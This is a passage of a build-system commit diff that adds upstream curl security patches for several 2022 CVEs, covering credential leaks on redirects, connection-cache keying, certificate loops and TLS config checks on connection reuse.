++ if(uc) {
++ free(newurl);
++ return Curl_uc_to_curlcode(uc);
++ }
++ port = atoi(portnum);
++ free(portnum);
++ }
++ if(port != data->info.conn_remote_port) {
++ infof(data, "Clear auth, redirects to port from %u to %u",
++ data->info.conn_remote_port, port);
++ clear = TRUE;
++ }
++ else {
++ char *scheme;
++ const struct Curl_handler *p;
++ uc = curl_url_get(data->state.uh, CURLUPART_SCHEME, &scheme, 0);
++ if(uc) {
++ free(newurl);
++ return Curl_uc_to_curlcode(uc);
++ }
++
++ p = Curl_builtin_scheme(scheme);
++ if(p && (p->protocol != data->info.conn_protocol)) {
++ infof(data, "Clear auth, redirects scheme from %s to %s",
++ data->info.conn_scheme, scheme);
++ clear = TRUE;
++ }
++ free(scheme);
++ }
++ if(clear) {
++ Curl_safefree(data->set.str[STRING_USERNAME]);
++ Curl_safefree(data->set.str[STRING_PASSWORD]);
++ }
++ }
+ }
+
+ if(type == FOLLOW_FAKE) {
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch
new file mode 100644
index 0000000000..a585f6a8fa
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch
@@ -0,0 +1,83 @@
+From 5dccf21ad49eed925e8f76b0cb844877239ce23d Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 17:59:15 +0200
+Subject: [PATCH] openssl: don't leak the SRP credentials in redirects either
+
+Follow-up to 620ea21410030
+
+Reported-by: Harry Sintonen
+Closes #8751
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/139a54ed0a172adaaf1a78d6f4fff50b2c3f9e08]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/http.c | 10 +++++-----
+ lib/http.h | 6 ++++++
+ lib/vtls/openssl.c | 3 ++-
+ 3 files changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/lib/http.c b/lib/http.c
+index 8b16c09..5291c07 100644
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -732,10 +732,10 @@ output_auth_headers(struct connectdata *conn,
+ }
+
+ /*
+- * allow_auth_to_host() tells if autentication, cookies or other "sensitive
+- * data" can (still) be sent to this host.
++ * Curl_allow_auth_to_host() tells if authentication, cookies or other
++ * "sensitive data" can (still) be sent to this host.
+ */
+-static bool allow_auth_to_host(struct Curl_easy *data)
++bool Curl_allow_auth_to_host(struct Curl_easy *data)
+ {
+ struct connectdata *conn = data->conn;
+ return (!data->state.this_is_a_follow ||
+@@ -816,7 +816,7 @@ Curl_http_output_auth(struct connectdata *conn,
+
+ /* To prevent the user+password to get sent to other than the original host
+ due to a location-follow */
+- if(allow_auth_to_host(data)
++ if(Curl_allow_auth_to_host(data)
+ || conn->bits.netrc
+ )
+ result = output_auth_headers(conn, authhost, request, path, FALSE);
+@@ -1891,7 +1891,7 @@ CURLcode Curl_add_custom_headers(struct connectdata *conn,
+ checkprefix("Cookie:", compare)) &&
+ /* be careful of sending this potentially sensitive header to
+ other hosts */
+- !allow_auth_to_host(data))
++ !Curl_allow_auth_to_host(data))
+ ;
+ else {
+ result = Curl_add_bufferf(&req_buffer, "%s\r\n", compare);
+diff --git a/lib/http.h b/lib/http.h
+index 4c1825f..4fbae1d 100644
+--- a/lib/http.h
++++ b/lib/http.h
+@@ -273,4 +273,10 @@ Curl_http_output_auth(struct connectdata *conn,
+ bool proxytunnel); /* TRUE if this is the request setting
+ up the proxy tunnel */
+
++/*
++ * Curl_allow_auth_to_host() tells if authentication, cookies or other
++ * "sensitive data" can (still) be sent to this host.
++ */
++bool Curl_allow_auth_to_host(struct Curl_easy *data);
++
+ #endif /* HEADER_CURL_HTTP_H */
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 006a8c8..a14cecc 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -2739,7 +2739,8 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ #endif
+
+ #ifdef USE_TLS_SRP
+- if(ssl_authtype == CURL_TLSAUTH_SRP) {
++ if((ssl_authtype == CURL_TLSAUTH_SRP) &&
++ Curl_allow_auth_to_host(data)) {
+ char * const ssl_username = SSL_SET_OPTION(username);
+
+ infof(data, "Using TLS-SRP username: %s\n", ssl_username);
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch
new file mode 100644
index 0000000000..2258681cab
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch
@@ -0,0 +1,35 @@
+From 7395752e2f7b87dc8c8f2a7137075e2da554aaea Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 26 Apr 2022 07:46:19 +0200
+Subject: [PATCH] gnutls: don't leak the SRP credentials in redirects
+
+Follow-up to 620ea21410030 and 139a54ed0a172a
+
+Reported-by: Harry Sintonen
+Closes #8752
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/093531556203decd92d92bccd431edbe5561781c]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/vtls/gtls.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 8c05102..3d0758d 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -581,11 +581,11 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+
+ #ifdef USE_TLS_SRP
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) {
++ if((SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) &&
++ Curl_allow_auth_to_host(data)) {
+ infof(data, "Using TLS-SRP username: %s\n", SSL_SET_OPTION(username));
+
+- rc = gnutls_srp_allocate_client_credentials(
+- &BACKEND->srp_client_cred);
++ rc = gnutls_srp_allocate_client_credentials(&BACKEND->srp_client_cred);
+ if(rc != GNUTLS_E_SUCCESS) {
+ failf(data, "gnutls_srp_allocate_client_cred() failed: %s",
+ gnutls_strerror(rc));
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27775.patch b/meta/recipes-support/curl/curl/CVE-2022-27775.patch
new file mode 100644
index 0000000000..b3fe7b4494
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27775.patch
@@ -0,0 +1,39 @@
+From 058f98dc3fe595f21dc26a5b9b1699e519ba5705 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 11:48:00 +0200
+Subject: [PATCH] conncache: include the zone id in the "bundle" hashkey
+
+Make connections to two separate IPv6 zone ids create separate
+connections.
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27775.html
+Closes #8747
+---
+ lib/conncache.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+CVE: CVE-2022-27775
+Upstream-Status: Backport [https://github.com/curl/curl/commit/058f98dc3fe595f21dc26a5b9b1699e519ba5705.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/conncache.c b/lib/conncache.c
+index ec669b971dc3..8948b53fa500 100644
+--- a/lib/conncache.c
++++ b/lib/conncache.c
+@@ -156,8 +156,12 @@
+ /* report back which name we used */
+ *hostp = hostname;
+
+- /* put the number first so that the hostname gets cut off if too long */
+- msnprintf(buf, len, "%ld%s", port, hostname);
++ /* put the numbers first so that the hostname gets cut off if too long */
++#ifdef ENABLE_IPV6
++ msnprintf(buf, len, "%u/%ld/%s", conn->scope_id, port, hostname);
++#else
++ msnprintf(buf, len, "%ld/%s", port, hostname);
++#endif
+ }
+
+ /* Returns number of connections currently held in the connection cache.
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27776.patch b/meta/recipes-support/curl/curl/CVE-2022-27776.patch
new file mode 100644
index 0000000000..1a13df2d95
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27776.patch
@@ -0,0 +1,114 @@
+From 6e659993952aa5f90f48864be84a1bbb047fc258 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 13:05:40 +0200
+Subject: [PATCH] http: avoid auth/cookie on redirects same host diff port
+
+CVE-2022-27776
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27776.html
+Closes #8749
+---
+ lib/http.c | 34 ++++++++++++++++++++++------------
+ lib/urldata.h | 16 +++++++++-------
+ 2 files changed, 31 insertions(+), 19 deletions(-)
+
+CVE: CVE-2022-27776
+Upstream-Status: Backport [https://github.com/curl/curl/commit/6e659993952aa5f90f48864be84a1bbb047fc258.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/http.c b/lib/http.c
+index ce79fc4e31c8..f0476f3b9272 100644
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -731,6 +731,21 @@
+ return CURLE_OK;
+ }
+
++/*
++ * allow_auth_to_host() tells if autentication, cookies or other "sensitive
++ * data" can (still) be sent to this host.
++ */
++static bool allow_auth_to_host(struct Curl_easy *data)
++{
++ struct connectdata *conn = data->conn;
++ return (!data->state.this_is_a_follow ||
++ data->set.allow_auth_to_other_hosts ||
++ (data->state.first_host &&
++ strcasecompare(data->state.first_host, conn->host.name) &&
++ (data->state.first_remote_port == conn->remote_port) &&
++ (data->state.first_remote_protocol == conn->handler->protocol)));
++}
++
+ /**
+ * Curl_http_output_auth() setups the authentication headers for the
+ * host/proxy and the correct authentication
+@@ -799,15 +799,12 @@
+ with it */
+ authproxy->done = TRUE;
+
+- /* To prevent the user+password to get sent to other than the original
+- host due to a location-follow, we do some weirdo checks here */
+- if(!data->state.this_is_a_follow ||
+- conn->bits.netrc ||
+- !data->state.first_host ||
+- data->set.allow_auth_to_other_hosts ||
+- strcasecompare(data->state.first_host, conn->host.name)) {
++ /* To prevent the user+password to get sent to other than the original host
++ due to a location-follow */
++ if(allow_auth_to_host(data)
++ || conn->bits.netrc
++ )
+ result = output_auth_headers(conn, authhost, request, path, FALSE);
+- }
+ else
+ authhost->done = TRUE;
+
+@@ -1879,10 +1891,7 @@
+ checkprefix("Cookie:", compare)) &&
+ /* be careful of sending this potentially sensitive header to
+ other hosts */
+- (data->state.this_is_a_follow &&
+- data->state.first_host &&
+- !data->set.allow_auth_to_other_hosts &&
+- !strcasecompare(data->state.first_host, conn->host.name)))
++ !allow_auth_to_host(data))
+ ;
+ else {
+ result = Curl_add_bufferf(&req_buffer, "%s\r\n", compare);
+@@ -2065,6 +2074,7 @@
+ return CURLE_OUT_OF_MEMORY;
+
+ data->state.first_remote_port = conn->remote_port;
++ data->state.first_remote_protocol = conn->handler->protocol;
+ }
+
+ if((conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_FTP)) &&
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 1d89b8d7fa68..ef2174d9e727 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1342,13 +1342,15 @@
+ char *ulbuf; /* allocated upload buffer or NULL */
+ curl_off_t current_speed; /* the ProgressShow() function sets this,
+ bytes / second */
+- char *first_host; /* host name of the first (not followed) request.
+- if set, this should be the host name that we will
+- sent authorization to, no else. Used to make Location:
+- following not keep sending user+password... This is
+- strdup() data.
+- */
+- int first_remote_port; /* remote port of the first (not followed) request */
++
++ /* host name, port number and protocol of the first (not followed) request.
++ if set, this should be the host name that we will sent authorization to,
++ no else. Used to make Location: following not keep sending user+password.
++ This is strdup()ed data. */
++ char *first_host;
++ int first_remote_port;
++ unsigned int first_remote_protocol;
++
+ struct curl_ssl_session *session; /* array of 'max_ssl_sessions' size */
+ long sessionage; /* number of the most recent session */
+ unsigned int tempcount; /* number of entries in use in tempwrite, 0 - 3 */
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27781.patch b/meta/recipes-support/curl/curl/CVE-2022-27781.patch
new file mode 100644
index 0000000000..ea1bc22928
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27781.patch
@@ -0,0 +1,46 @@
+From 7a1f183039a6a6c9099a114f5e5c94777413c767 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 10:07:15 +0200
+Subject: [PATCH] nss: return error if seemingly stuck in a cert loop
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+CVE-2022-27781
+
+Reported-by: Florian Kohnhäuser
+Bug: https://curl.se/docs/CVE-2022-27781.html
+Closes #8822
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/5c7da89d404bf59c8dd82a001119a16d18365917]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/vtls/nss.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index 375c78b..86102f7 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -950,6 +950,9 @@ static void display_cert_info(struct Curl_easy *data,
+ PR_Free(common_name);
+ }
+
++/* A number of certs that will never occur in a real server handshake */
++#define TOO_MANY_CERTS 300
++
+ static CURLcode display_conn_info(struct connectdata *conn, PRFileDesc *sock)
+ {
+ CURLcode result = CURLE_OK;
+@@ -986,6 +989,11 @@ static CURLcode display_conn_info(struct connectdata *conn, PRFileDesc *sock)
+ cert2 = CERT_FindCertIssuer(cert, now, certUsageSSLCA);
+ while(cert2) {
+ i++;
++ if(i >= TOO_MANY_CERTS) {
++ CERT_DestroyCertificate(cert2);
++ failf(data, "certificate loop");
++ return CURLE_SSL_CERTPROBLEM;
++ }
+ if(cert2->isRoot) {
+ CERT_DestroyCertificate(cert2);
+ break;
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch b/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch
new file mode 100644
index 0000000000..6b6d0e1938
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch
@@ -0,0 +1,363 @@
+From 907a16c832d9ce0ffa7e9b2297548063095a7242 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 23:13:53 +0200
+Subject: [PATCH] tls: check more TLS details for connection reuse
+
+CVE-2022-27782
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27782.html
+Closes #8825
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/f18af4f874cecab82a9797e8c7541e0990c7a64c]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/setopt.c | 29 +++++++++++++++++------------
+ lib/url.c | 17 ++++++++++-------
+ lib/urldata.h | 13 +++++++------
+ lib/vtls/gtls.c | 30 ++++++++++++++++--------------
+ lib/vtls/mbedtls.c | 2 +-
+ lib/vtls/nss.c | 6 +++---
+ lib/vtls/openssl.c | 10 +++++-----
+ lib/vtls/vtls.c | 1 +
+ 8 files changed, 60 insertions(+), 48 deletions(-)
+
+diff --git a/lib/setopt.c b/lib/setopt.c
+index 4648c87..bebb2e4 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -2130,6 +2130,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+
+ case CURLOPT_SSL_OPTIONS:
+ arg = va_arg(param, long);
++ data->set.ssl.primary.ssl_options = (unsigned char)(arg & 0xff);
+ data->set.ssl.enable_beast =
+ (bool)((arg&CURLSSLOPT_ALLOW_BEAST) ? TRUE : FALSE);
+ data->set.ssl.no_revoke = !!(arg & CURLSSLOPT_NO_REVOKE);
+@@ -2139,6 +2140,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ #ifndef CURL_DISABLE_PROXY
+ case CURLOPT_PROXY_SSL_OPTIONS:
+ arg = va_arg(param, long);
++ data->set.proxy_ssl.primary.ssl_options = (unsigned char)(arg & 0xff);
+ data->set.proxy_ssl.enable_beast =
+ (bool)((arg&CURLSSLOPT_ALLOW_BEAST) ? TRUE : FALSE);
+ data->set.proxy_ssl.no_revoke = !!(arg & CURLSSLOPT_NO_REVOKE);
+@@ -2541,44 +2543,47 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ case CURLOPT_TLSAUTH_USERNAME:
+ result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_USERNAME_ORIG],
+ va_arg(param, char *));
+- if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] && !data->set.ssl.authtype)
+- data->set.ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++ if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] &&
++ !data->set.ssl.primary.authtype)
++ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
+ break;
+ case CURLOPT_PROXY_TLSAUTH_USERNAME:
+ result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_USERNAME_PROXY],
+ va_arg(param, char *));
+ if(data->set.str[STRING_TLSAUTH_USERNAME_PROXY] &&
+- !data->set.proxy_ssl.authtype)
+- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++ !data->set.proxy_ssl.primary.authtype)
++ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to
++ SRP */
+ break;
+ case CURLOPT_TLSAUTH_PASSWORD:
+ result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_PASSWORD_ORIG],
+ va_arg(param, char *));
+- if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] && !data->set.ssl.authtype)
+- data->set.ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++ if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] &&
++ !data->set.ssl.primary.authtype)
++ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
+ break;
+ case CURLOPT_PROXY_TLSAUTH_PASSWORD:
+ result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_PASSWORD_PROXY],
+ va_arg(param, char *));
+ if(data->set.str[STRING_TLSAUTH_USERNAME_PROXY] &&
+- !data->set.proxy_ssl.authtype)
+- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++ !data->set.proxy_ssl.primary.authtype)
++ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default */
+ break;
+ case CURLOPT_TLSAUTH_TYPE:
+ argptr = va_arg(param, char *);
+ if(!argptr ||
+ strncasecompare(argptr, "SRP", strlen("SRP")))
+- data->set.ssl.authtype = CURL_TLSAUTH_SRP;
++ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP;
+ else
+- data->set.ssl.authtype = CURL_TLSAUTH_NONE;
++ data->set.ssl.primary.authtype = CURL_TLSAUTH_NONE;
+ break;
+ case CURLOPT_PROXY_TLSAUTH_TYPE:
+ argptr = va_arg(param, char *);
+ if(!argptr ||
+ strncasecompare(argptr, "SRP", strlen("SRP")))
+- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP;
++ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP;
+ else
+- data->set.proxy_ssl.authtype = CURL_TLSAUTH_NONE;
++ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_NONE;
+ break;
+ #endif
+ #ifdef USE_ARES
+diff --git a/lib/url.c b/lib/url.c
+index efa3dc7..6518be9 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -482,7 +482,7 @@ CURLcode Curl_init_userdefined(struct Curl_easy *data)
+ set->ssl.primary.verifypeer = TRUE;
+ set->ssl.primary.verifyhost = TRUE;
+ #ifdef USE_TLS_SRP
+- set->ssl.authtype = CURL_TLSAUTH_NONE;
++ set->ssl.primary.authtype = CURL_TLSAUTH_NONE;
+ #endif
+ set->ssh_auth_types = CURLSSH_AUTH_DEFAULT; /* defaults to any auth
+ type */
+@@ -3594,8 +3594,9 @@ static CURLcode create_conn(struct Curl_easy *data,
+ data->set.proxy_ssl.primary.pinned_key =
+ data->set.str[STRING_SSL_PINNEDPUBLICKEY_PROXY];
+
+- data->set.ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
+- data->set.proxy_ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_PROXY];
++ data->set.ssl.primary.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
++ data->set.proxy_ssl.primary.CRLfile =
++ data->set.str[STRING_SSL_CRLFILE_PROXY];
+ data->set.ssl.cert = data->set.str[STRING_CERT_ORIG];
+ data->set.proxy_ssl.cert = data->set.str[STRING_CERT_PROXY];
+ data->set.ssl.cert_type = data->set.str[STRING_CERT_TYPE_ORIG];
+@@ -3609,10 +3610,12 @@ static CURLcode create_conn(struct Curl_easy *data,
+ data->set.ssl.primary.clientcert = data->set.str[STRING_CERT_ORIG];
+ data->set.proxy_ssl.primary.clientcert = data->set.str[STRING_CERT_PROXY];
+ #ifdef USE_TLS_SRP
+- data->set.ssl.username = data->set.str[STRING_TLSAUTH_USERNAME_ORIG];
+- data->set.proxy_ssl.username = data->set.str[STRING_TLSAUTH_USERNAME_PROXY];
+- data->set.ssl.password = data->set.str[STRING_TLSAUTH_PASSWORD_ORIG];
+- data->set.proxy_ssl.password = data->set.str[STRING_TLSAUTH_PASSWORD_PROXY];
++ data->set.ssl.primary.username = data->set.str[STRING_TLSAUTH_USERNAME_ORIG];
++ data->set.proxy_ssl.primary.username =
++ data->set.str[STRING_TLSAUTH_USERNAME_PROXY];
++ data->set.ssl.primary.password = data->set.str[STRING_TLSAUTH_PASSWORD_ORIG];
++ data->set.proxy_ssl.primary.password =
++ data->set.str[STRING_TLSAUTH_PASSWORD_PROXY];
+ #endif
+
+ if(!Curl_clone_primary_ssl_config(&data->set.ssl.primary,
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ab1b267..ad0ef8f 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -231,6 +231,13 @@ struct ssl_primary_config {
+ char *cipher_list; /* list of ciphers to use */
+ char *cipher_list13; /* list of TLS 1.3 cipher suites to use */
+ char *pinned_key;
++ char *CRLfile; /* CRL to check certificate revocation */
++ #ifdef USE_TLS_SRP
++ char *username; /* TLS username (for, e.g., SRP) */
++ char *password; /* TLS password (for, e.g., SRP) */
++ enum CURL_TLSAUTH authtype; /* TLS authentication type (default SRP) */
++ #endif
++ unsigned char ssl_options; /* the CURLOPT_SSL_OPTIONS bitmask */
+ BIT(verifypeer); /* set TRUE if this is desired */
+ BIT(verifyhost); /* set TRUE if CN/SAN must match hostname */
+ BIT(verifystatus); /* set TRUE if certificate status must be checked */
+@@ -240,7 +247,6 @@ struct ssl_primary_config {
+ struct ssl_config_data {
+ struct ssl_primary_config primary;
+ long certverifyresult; /* result from the certificate verification */
+- char *CRLfile; /* CRL to check certificate revocation */
+ curl_ssl_ctx_callback fsslctx; /* function to initialize ssl ctx */
+ void *fsslctxp; /* parameter for call back */
+ char *cert; /* client certificate file name */
+@@ -248,11 +254,6 @@ struct ssl_config_data {
+ char *key; /* private key file name */
+ char *key_type; /* format for private key (default: PEM) */
+ char *key_passwd; /* plain text private key password */
+-#ifdef USE_TLS_SRP
+- char *username; /* TLS username (for, e.g., SRP) */
+- char *password; /* TLS password (for, e.g., SRP) */
+- enum CURL_TLSAUTH authtype; /* TLS authentication type (default SRP) */
+-#endif
+ BIT(certinfo); /* gather lots of certificate info */
+ BIT(falsestart);
+ BIT(enable_beast); /* allow this flaw for interoperability's sake*/
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 3d0758d..92c301c 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -581,9 +581,10 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+
+ #ifdef USE_TLS_SRP
+- if((SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) &&
++ if((SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP) &&
+ Curl_allow_auth_to_host(data)) {
+- infof(data, "Using TLS-SRP username: %s\n", SSL_SET_OPTION(username));
++ infof(data, "Using TLS-SRP username: %s\n",
++ SSL_SET_OPTION(primary.username));
+
+ rc = gnutls_srp_allocate_client_credentials(&BACKEND->srp_client_cred);
+ if(rc != GNUTLS_E_SUCCESS) {
+@@ -593,8 +594,8 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+
+ rc = gnutls_srp_set_client_credentials(BACKEND->srp_client_cred,
+- SSL_SET_OPTION(username),
+- SSL_SET_OPTION(password));
++ SSL_SET_OPTION(primary.username),
++ SSL_SET_OPTION(primary.password));
+ if(rc != GNUTLS_E_SUCCESS) {
+ failf(data, "gnutls_srp_set_client_cred() failed: %s",
+ gnutls_strerror(rc));
+@@ -648,19 +649,19 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+ #endif
+
+- if(SSL_SET_OPTION(CRLfile)) {
++ if(SSL_SET_OPTION(primary.CRLfile)) {
+ /* set the CRL list file */
+ rc = gnutls_certificate_set_x509_crl_file(BACKEND->cred,
+- SSL_SET_OPTION(CRLfile),
++ SSL_SET_OPTION(primary.CRLfile),
+ GNUTLS_X509_FMT_PEM);
+ if(rc < 0) {
+ failf(data, "error reading crl file %s (%s)",
+- SSL_SET_OPTION(CRLfile), gnutls_strerror(rc));
++ SSL_SET_OPTION(primary.CRLfile), gnutls_strerror(rc));
+ return CURLE_SSL_CRL_BADFILE;
+ }
+ else
+ infof(data, "found %d CRL in %s\n",
+- rc, SSL_SET_OPTION(CRLfile));
++ rc, SSL_SET_OPTION(primary.CRLfile));
+ }
+
+ /* Initialize TLS session as a client */
+@@ -879,7 +880,7 @@ gtls_connect_step1(struct connectdata *conn,
+
+ #ifdef USE_TLS_SRP
+ /* put the credentials to the current session */
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) {
++ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP) {
+ rc = gnutls_credentials_set(session, GNUTLS_CRD_SRP,
+ BACKEND->srp_client_cred);
+ if(rc != GNUTLS_E_SUCCESS) {
+@@ -1061,8 +1062,8 @@ gtls_connect_step3(struct connectdata *conn,
+ SSL_CONN_CONFIG(verifyhost) ||
+ SSL_CONN_CONFIG(issuercert)) {
+ #ifdef USE_TLS_SRP
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+- && SSL_SET_OPTION(username) != NULL
++ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP
++ && SSL_SET_OPTION(primary.username) != NULL
+ && !SSL_CONN_CONFIG(verifypeer)
+ && gnutls_cipher_get(session)) {
+ /* no peer cert, but auth is ok if we have SRP user and cipher and no
+@@ -1116,7 +1117,8 @@ gtls_connect_step3(struct connectdata *conn,
+ failf(data, "server certificate verification failed. CAfile: %s "
+ "CRLfile: %s", SSL_CONN_CONFIG(CAfile) ? SSL_CONN_CONFIG(CAfile):
+ "none",
+- SSL_SET_OPTION(CRLfile)?SSL_SET_OPTION(CRLfile):"none");
++ SSL_SET_OPTION(primary.CRLfile) ?
++ SSL_SET_OPTION(primary.CRLfile) : "none");
+ return CURLE_PEER_FAILED_VERIFICATION;
+ }
+ else
+@@ -1703,8 +1705,8 @@ static int Curl_gtls_shutdown(struct connectdata *conn, int sockindex)
+ gnutls_certificate_free_credentials(BACKEND->cred);
+
+ #ifdef USE_TLS_SRP
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+- && SSL_SET_OPTION(username) != NULL)
++ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP
++ && SSL_SET_OPTION(primary.username) != NULL)
+ gnutls_srp_free_client_credentials(BACKEND->srp_client_cred);
+ #endif
+
+diff --git a/lib/vtls/mbedtls.c b/lib/vtls/mbedtls.c
+index 19df847..62d2b00 100644
+--- a/lib/vtls/mbedtls.c
++++ b/lib/vtls/mbedtls.c
+@@ -245,7 +245,7 @@ mbed_connect_step1(struct connectdata *conn,
+ const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+ const char * const ssl_capath = SSL_CONN_CONFIG(CApath);
+ char * const ssl_cert = SSL_SET_OPTION(cert);
+- const char * const ssl_crlfile = SSL_SET_OPTION(CRLfile);
++ const char * const ssl_crlfile = SSL_SET_OPTION(primary.CRLfile);
+ const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
+ conn->host.name;
+ const long int port = SSL_IS_PROXY() ? conn->port : conn->remote_port;
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index 86102f7..62fd7a2 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -1955,13 +1955,13 @@ static CURLcode nss_setup_connect(struct connectdata *conn, int sockindex)
+ }
+ }
+
+- if(SSL_SET_OPTION(CRLfile)) {
+- const CURLcode rv = nss_load_crl(SSL_SET_OPTION(CRLfile));
++ if(SSL_SET_OPTION(primary.CRLfile)) {
++ const CURLcode rv = nss_load_crl(SSL_SET_OPTION(primary.CRLfile));
+ if(rv) {
+ result = rv;
+ goto error;
+ }
+- infof(data, " CRLfile: %s\n", SSL_SET_OPTION(CRLfile));
++ infof(data, " CRLfile: %s\n", SSL_SET_OPTION(primary.CRLfile));
+ }
+
+ if(SSL_SET_OPTION(cert)) {
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index a14cecc..ec5a8f5 100644
